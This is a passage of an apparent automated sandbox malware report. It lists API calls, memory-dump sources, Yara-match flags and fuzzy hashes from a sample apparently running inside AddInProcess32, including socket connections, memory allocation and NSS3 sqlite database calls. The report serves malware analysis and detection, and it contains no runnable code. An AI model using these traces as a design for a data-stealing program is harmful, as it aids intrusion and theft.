                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2422867632-0
                                                                                      • Opcode ID: 1078c669968be127ba08c17c390ca268807b7e9235ff5ae274db143b4fdbc023
                                                                                      • Instruction ID: 41e56a5c765a80d41feaf94cf30967d86a3c9cebd33807d18abbbbde3b634ef2
                                                                                      • Opcode Fuzzy Hash: 1078c669968be127ba08c17c390ca268807b7e9235ff5ae274db143b4fdbc023
                                                                                      • Instruction Fuzzy Hash: 12D05EB71082097FAB059FA8AC04CE77BEDEF08210301843AB985C7100E671DD109BA4
                                                                                      APIs
                                                                                        • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,759801C0,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 004112DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateEventlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 2275612694-0
                                                                                      • Opcode ID: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                                                                      • Instruction ID: 39468192288ec31cf53fa38ac828197baabee26d9983865f2de3b863843106a1
                                                                                      • Opcode Fuzzy Hash: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                                                                      • Instruction Fuzzy Hash: 7CD02E322082017BD700AF91DC02F92BF29EB50760F008036F24882180CBB1A020C790
                                                                                      APIs
                                                                                      • sqlite3_initialize.NSS3(?,6CCA9D3C,00000000,?,00000000,?,00000000,?,?,6CC74621,?,00000001,00000000,?,?,6CCA9C66), ref: 6CC63CDA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_initialize
                                                                                      • String ID:
                                                                                      • API String ID: 1587646821-0
                                                                                      • Opcode ID: f92ef714804b0d20f96eb937b4418330e5d74ebbbd54f2f2fa5a1c21c32e8300
                                                                                      • Instruction ID: c4476a7a9b0cac064a561304c287bbcae29671b78dbada8f704cf99d482015f1
                                                                                      • Opcode Fuzzy Hash: f92ef714804b0d20f96eb937b4418330e5d74ebbbd54f2f2fa5a1c21c32e8300
                                                                                      • Instruction Fuzzy Hash: B4C0123284420EAADF421FE6AD048AE3B5AAB4421CB448021BD1D84A20FB33D136A685
                                                                                      APIs
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,759801C0,00000000,00405B72), ref: 004117BF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateMutex
                                                                                      • String ID:
                                                                                      • API String ID: 1964310414-0
                                                                                      • Opcode ID: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                                                                      • Instruction ID: d1f17f3edcdec86f78565eb2beadc44be2d21716b89def248c0870d2ffc3ae74
                                                                                      • Opcode Fuzzy Hash: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                                                                      • Instruction Fuzzy Hash: 72D012F15045206FA3249F395C088A775DDDF98730315CF39B4A5C72D4E5308C808760
                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(?,00000000,?,0040C034,00000000), ref: 00411431
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DeleteFileFreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2980554289-0
                                                                                      • Opcode ID: b2eb78024d382a117d59e5a93a4f2b36fb657eeb587c21ce6310c890a918612f
                                                                                      • Instruction ID: 4db726319f80e3e22699c6353bccf335bfd922c4018d47295790eca09b42df54
                                                                                      • Opcode Fuzzy Hash: b2eb78024d382a117d59e5a93a4f2b36fb657eeb587c21ce6310c890a918612f
                                                                                      • Instruction Fuzzy Hash: A8C08C3120022877CB002FA6EC088CABF28DB012F17008072FD0D87310DA399C00CBC4
                                                                                      APIs
                                                                                      • RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: d1cf315f0c3b828755566f774ab1677f06f540783bee4846a1eb8c5dc7d1a683
                                                                                      • Instruction ID: 9d8d642a2df10e52aa6db1d194c77715a7231d9df8bfeebc40ec518d9b126583
                                                                                      • Opcode Fuzzy Hash: d1cf315f0c3b828755566f774ab1677f06f540783bee4846a1eb8c5dc7d1a683
                                                                                      • Instruction Fuzzy Hash: 13C04C31014221DBD7355F14E4047D57BF5AB05352F25046E90C055164E7B509D0CA48
                                                                                      APIs
                                                                                      • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,0041274C,00000000,?,?,?,?,00000000,759801C0,00000000), ref: 00410C44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 4241100979-0
                                                                                      • Opcode ID: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                                                                      • Instruction ID: bf7d7d0385146835833033b658300741a11cd90afef40312a0121630c5b8194d
                                                                                      • Opcode Fuzzy Hash: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                                                                      • Instruction Fuzzy Hash: 7AB012303E82005BDE101B708C06F103520A712B07F2001B0B112C90E0C66100065504
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ac760dafbb7999424fc2b6b37f3f3b11be94524e3141ca70c93e57071509a19
                                                                                      • Instruction ID: a349604d82f8aa68656a9bbfcb73756f4e177d072c6cc21c8ad4598a8becd5f8
                                                                                      • Opcode Fuzzy Hash: 6ac760dafbb7999424fc2b6b37f3f3b11be94524e3141ca70c93e57071509a19
                                                                                      • Instruction Fuzzy Hash: E941A3312063009FD7109FA6DC80BC77BF4AF4532CF18502AE9698BA91FB3599958A61
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,?,?,?,?,?,00000000), ref: 00411F1D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 5aa893b147cd494e988694cff7b7e07bcd5e41472bd2b92bb5df6cfcc3a4b335
                                                                                      • Instruction ID: 830f06e0aea0cfe5375fbe7970b874c1b88f64c51630652c11d09ff019b1d50d
                                                                                      • Opcode Fuzzy Hash: 5aa893b147cd494e988694cff7b7e07bcd5e41472bd2b92bb5df6cfcc3a4b335
                                                                                      • Instruction Fuzzy Hash: CF21E671700204ABCF159FA98C86BBFB7E5AF84308F18446AFA45DB392D778D842C759
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2bb360022cfeacbcfeb36e66c2034c8cca5ae7bd61c9b4385b68f53123e8051c
                                                                                      • Instruction ID: 779ea3a4d01821fe31bdce4b4a23910e755e41648f015d1003bc921f32238f1c
                                                                                      • Opcode Fuzzy Hash: 2bb360022cfeacbcfeb36e66c2034c8cca5ae7bd61c9b4385b68f53123e8051c
                                                                                      • Instruction Fuzzy Hash: 8F310471904B42AFD7218FA9C889747BBF4EF4231AF14C96DD59982F01F332E58A8791
                                                                                      APIs
                                                                                        • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                                                                        • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                                                                        • Part of subcall function 0040594B: getaddrinfo.WS2_32(759801C0,00000000,00404FB9,00000000), ref: 00405998
                                                                                        • Part of subcall function 0040594B: socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                                                                        • Part of subcall function 0040594B: htons.WS2_32(00000000), ref: 004059D5
                                                                                        • Part of subcall function 0040594B: freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                                                                        • Part of subcall function 0040594B: connect.WS2_32(?,?,00000010), ref: 004059F1
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,00000000,759801C0,00000000), ref: 00404FE6
                                                                                        • Part of subcall function 0040577F: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                                                                        • Part of subcall function 0040577F: recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                                                                        • Part of subcall function 0040577F: recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWiderecv$FreeSleepVirtualconnectfreeaddrinfogetaddrinfohtonssetsockoptsocket
                                                                                      • String ID:
                                                                                      • API String ID: 3250391716-0
                                                                                      • Opcode ID: f7f904632dd529d26bac610cb0c16db30709d14abaac0826643fbdcd52d366be
                                                                                      • Instruction ID: 3798276f2d6deacb5579a467cc78981a12bd2d3cc445b7be3850e793cb4ca415
                                                                                      • Opcode Fuzzy Hash: f7f904632dd529d26bac610cb0c16db30709d14abaac0826643fbdcd52d366be
                                                                                      • Instruction Fuzzy Hash: C4015271A00916BBCB14AB65D949BEEF779FF40319F00052EE41A73281DB786A15CBD4
                                                                                      APIs
                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,00000000,00000000,?,0040C663,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C2E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocLocal
                                                                                      • String ID:
                                                                                      • API String ID: 3494564517-0
                                                                                      • Opcode ID: 4e9351147455096ae454e4174e0e0ffe1b26029dc8060c09fc5289dac908aa03
                                                                                      • Instruction ID: a211cf5e99945d475c661ad795914e4701b3cf2ea838e22186ffe22b94d8b6bf
                                                                                      • Opcode Fuzzy Hash: 4e9351147455096ae454e4174e0e0ffe1b26029dc8060c09fc5289dac908aa03
                                                                                      • Instruction Fuzzy Hash: 23E0922B72076297D721578D94D0B6796AA8BCAB10B38823B9E54E3354DE75DC02C2E8
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(?,?,00000001,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001,?,?), ref: 6CCA9C7B
                                                                                        • Part of subcall function 6CC74610: memcpy.VCRUNTIME140(?,?,00000000,00000000,?,?,6CCA9C66,?,?,00000001,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC74634
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3510742995-0
                                                                                      • Opcode ID: d818e73decae5d96e0be4472be8da4c2d9d626bb1a1fda1f75ca18f88d641b8d
                                                                                      • Instruction ID: af9dec42b8e4617be9c8635e3ec30dc379103bb8aca1193e2b8912c3e82bd2ca
                                                                                      • Opcode Fuzzy Hash: d818e73decae5d96e0be4472be8da4c2d9d626bb1a1fda1f75ca18f88d641b8d
                                                                                      • Instruction Fuzzy Hash: 7DE06DB2900216BBCF089F98DC4A8DAB769FF447187058659F9189BA01E771E990CBE0
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,00000000,?,?,6CCA9C66,?,?,00000001,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC74634
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3510742995-0
                                                                                      • Opcode ID: ac225f6630e88cef1d58acb92289895695b06d71d0281a1e0760b53e0c44d882
                                                                                      • Instruction ID: afe4fe82d2b55faef10deb1fbedc379306f51117e7696787161f2d3a5655cfc8
                                                                                      • Opcode Fuzzy Hash: ac225f6630e88cef1d58acb92289895695b06d71d0281a1e0760b53e0c44d882
                                                                                      • Instruction Fuzzy Hash: 00E0DF775007046BCB248F95DC00C8777AAEFC1364705081DE61802A00EB32E5198BA0
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                                                                      • Instruction ID: e48ffaa35cf7c95941dea0d5a44f438d870c849a0c4b6b129c3fdc7458d1fa28
                                                                                      • Opcode Fuzzy Hash: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                                                                      • Instruction Fuzzy Hash: 58C012223482602AE124111A7C1AF5B9DACCBC1FB1F01002FF6059A2D0D9D00C0181A8
                                                                                      APIs
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                                                                      • Instruction ID: d77e01f5aa36a87b39216e07334d8eada759ddd446e76f586daee25b3cfe99bb
                                                                                      • Opcode Fuzzy Hash: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                                                                      • Instruction Fuzzy Hash: F8B0923438070157EE2CDB208C55F6A2220BB80B05FA089ACB102AA1D08AB9E4028A08
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00406004
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                                                                      • Instruction ID: d603def4ad70c1049ddec86c054817805532c4fd5811fc6e80ce733ca9b25ee4
                                                                                      • Opcode Fuzzy Hash: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                                                                      • Instruction Fuzzy Hash: 40A002B07D93047EFD6997509D1FF553D68A744F16F604154B3096D0D0A5E02500C52D
                                                                                      APIs
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                                                                      • Instruction ID: a4afafc7f9fbe744b945ffb19ace319cc8b7579b2679098b8a9567e0cb6a054f
                                                                                      • Opcode Fuzzy Hash: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                                                                      • Instruction Fuzzy Hash: E6A002706D470066ED7457605D4AF4526247740B51F208A947241A80E08AF5A0458A5C
                                                                                      APIs
                                                                                        • Part of subcall function 6CC812DB: sqlite3_mprintf.NSS3(INSERT INTO %Q.'%q_content' VALUES(%s),?,?,6CD5A1D0,00000000,00000000,00000000), ref: 6CC81469
                                                                                        • Part of subcall function 6CC812DB: sqlite3_free.NSS3(?,00000000,00000000,000000FF,00000001,?,00000000,00000000,00000000,00000000), ref: 6CC814C8
                                                                                        • Part of subcall function 6CC812DB: sqlite3_bind_parameter_count.NSS3(?,00000000,00000000,00000000), ref: 6CC814EA
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC7EF4F
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,?,?,00000000,?,00000002,00000000,?,00000000,00000003,00000000,?,?,?,00000000), ref: 6CC7EF6D
                                                                                        • Part of subcall function 6CC6525C: sqlite3_mutex_leave.NSS3(?,?,?,?,?,?,?,?,6CC65257,?,?,?), ref: 6CC65293
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC7EF81
                                                                                      • sqlite3_bind_int64.NSS3(?,00000002,-000003FF,?,?,?,00000400,00000000,00000000,00000003,00000000,?,?,?,00000000,00000000), ref: 6CC7EF99
                                                                                      • sqlite3_step.NSS3(?,?,00000002,-000003FF,?,?,?,00000400,00000000,00000000,00000003,00000000,?,?,?,00000000), ref: 6CC7EF9F
                                                                                      • sqlite3_step.NSS3(?,?,?,?,?,?,?,?,00000400,00000000,00000000,00000003,00000000,?), ref: 6CC7EFEB
                                                                                      • sqlite3_reset.NSS3(?,?,?,?,00000400,00000000,00000000,00000003,00000000,?,?,?,00000000,00000000,?,?), ref: 6CC7EFFB
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000400), ref: 6CC7F05F
                                                                                      • sqlite3_step.NSS3(?,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7F065
                                                                                      • sqlite3_bind_int.NSS3(?,00000001,?), ref: 6CC7F07C
                                                                                      • sqlite3_column_int.NSS3(?,00000000,?,00000001,?), ref: 6CC7F088
                                                                                      • sqlite3_bind_int.NSS3(?,00000002,00000000,?,00000000,?,00000001,?), ref: 6CC7F091
                                                                                      • sqlite3_column_int.NSS3(?,00000001,?,00000002,00000000,?,00000000,?,00000001,?), ref: 6CC7F099
                                                                                      • sqlite3_bind_int.NSS3(?,00000003,00000000,?,00000001,?,00000002,00000000,?,00000000,?,00000001,?), ref: 6CC7F0A2
                                                                                      • sqlite3_step.NSS3(?,?,00000003,00000000,?,00000001,?,00000002,00000000,?,00000000,?,00000001,?), ref: 6CC7F0A8
                                                                                      • sqlite3_reset.NSS3(?,?,?,00000003,00000000,?,00000001,?,00000002,00000000,?,00000000,?,00000001,?), ref: 6CC7F0AE
                                                                                      • sqlite3_step.NSS3(?), ref: 6CC7F0BD
                                                                                      • sqlite3_reset.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7F0C9
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,?,?), ref: 6CC7F0E0
                                                                                      • sqlite3_step.NSS3(?,?,00000001,?,?), ref: 6CC7F0E8
                                                                                      • sqlite3_reset.NSS3(?,?,?,00000001,?,?), ref: 6CC7F0F0
                                                                                      • sqlite3_reset.NSS3(?), ref: 6CC7F103
                                                                                        • Part of subcall function 6CC7F1E3: sqlite3_column_text.NSS3(?,00000002,?,?,00000002,?,?,?,?,?,00000400,00000000,00000000,00000003,00000000,?), ref: 6CC7F1F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_step$sqlite3_reset$sqlite3_bind_int64$sqlite3_bind_int$Unothrow_t@std@@@__ehfuncinfo$??2@sqlite3_column_int$sqlite3_bind_parameter_countsqlite3_column_textsqlite3_freesqlite3_mprintfsqlite3_mutex_leave
                                                                                      • String ID:
                                                                                      • API String ID: 1718738895-0
                                                                                      • Opcode ID: fb33a5007752293e2bf3dba5b1d4ee2f541f6372eb8bc82b05feb4a5b6e9cb96
                                                                                      • Instruction ID: 832b70124423e099df6d0cca456e5eb054f5a6840932738ea119c312bc69e68e
                                                                                      • Opcode Fuzzy Hash: fb33a5007752293e2bf3dba5b1d4ee2f541f6372eb8bc82b05feb4a5b6e9cb96
                                                                                      • Instruction Fuzzy Hash: B951C272D00219BEEB219AA6CDC1EEF7678EF41B18F140529F900BAF41FB718E1546A1
                                                                                      APIs
                                                                                        • Part of subcall function 6CC812DB: sqlite3_mprintf.NSS3(INSERT INTO %Q.'%q_content' VALUES(%s),?,?,6CD5A1D0,00000000,00000000,00000000), ref: 6CC81469
                                                                                        • Part of subcall function 6CC812DB: sqlite3_free.NSS3(?,00000000,00000000,000000FF,00000001,?,00000000,00000000,00000000,00000000), ref: 6CC814C8
                                                                                        • Part of subcall function 6CC812DB: sqlite3_bind_parameter_count.NSS3(?,00000000,00000000,00000000), ref: 6CC814EA
                                                                                      • sqlite3_bind_int64.NSS3(00000006,00000001,00000006,?,?,?,00000000,00000000,?,00000000,?,?,00000006,?,00000000,00000000), ref: 6CC81D5F
                                                                                        • Part of subcall function 6CC6525C: sqlite3_mutex_leave.NSS3(?,?,?,?,?,?,?,?,6CC65257,?,?,?), ref: 6CC65293
                                                                                      • sqlite3_bind_int.NSS3(00000006,00000002,?,00000006,00000001,00000006,?,?,?,00000000,00000000,?,00000000,?,?,00000006), ref: 6CC81D6A
                                                                                        • Part of subcall function 6CC65243: sqlite3_bind_int64.NSS3(?,?,?), ref: 6CC65252
                                                                                      • sqlite3_step.NSS3(00000006,00000006,00000002,?,00000006,00000001,00000006,?,?,?,00000000,00000000,?,00000000,?,?), ref: 6CC81D70
                                                                                      • sqlite3_column_blob.NSS3(00000006,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 6CC81D80
